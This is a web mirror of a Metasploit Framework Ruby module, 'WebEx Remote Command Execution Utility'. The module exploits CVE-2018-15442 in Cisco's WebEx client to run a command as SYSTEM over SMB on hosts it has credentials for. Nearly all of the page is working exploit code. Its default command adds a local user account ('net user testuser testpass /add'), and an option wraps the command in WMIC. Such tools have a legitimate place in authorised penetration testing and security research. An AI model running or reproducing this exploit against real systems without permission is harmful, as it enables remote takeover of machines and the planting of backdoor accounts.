CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/webexec_command.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::SMB::Client::WebExec

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  # Aliases for common classes

12
  SIMPLE = Rex::Proto::SMB::SimpleClient

13
  XCEPT  = Rex::Proto::SMB::Exceptions

14
  CONST  = Rex::Proto::SMB::Constants

15


16
  def initialize(info = {})

17
    super(update_info(info,

18
      'Name'           => 'WebEx Remote Command Execution Utility',

19
      'Description'    => %q{

20
        This module enables the execution of a single command as System by exploiting a remote

21
        code execution vulnerability in Cisco's WebEx client software.

22
      },

23


24
      'Author'         => [

25
        'Ron Bowes <[email protected]>',

26
      ],

27


28
      'License'        => MSF_LICENSE,

29
      'References'     => [

30
        ['URL', 'https://webexec.org'],

31
        ['CVE', '2018-15442']

32
      ]

33
    ))

34


35
    register_options([

36
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),

37
      OptPort.new('RPORT', [true, 'The Target port', 445]),

38
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),

39
    ])

40
  end

41


42
  # This is the main control method

43
  def run_host(ip)

44
    @smbshare = datastore['SMBSHARE']

45
    @ip = ip

46


47
    # Try and authenticate with given credentials

48
    if connect

49
      begin

50
        smb_login

51
      rescue Rex::Proto::SMB::Exceptions::Error => autherror

52
        print_error("Unable to authenticate with given credentials: #{autherror}")

53
        return

54
      end

55


56
      command = datastore['COMMAND']

57
      if datastore['FORCE_GUI']

58
        command = "WMIC PROCESS CALL Create \"#{command}\""

59
      end

60


61
      wexec(true) do |opts|

62
        execute_single_command(command, opts)

63
      end

64


65
      print_good("Command completed!")

66
      disconnect

67
    end

68
  end

69
end

70


71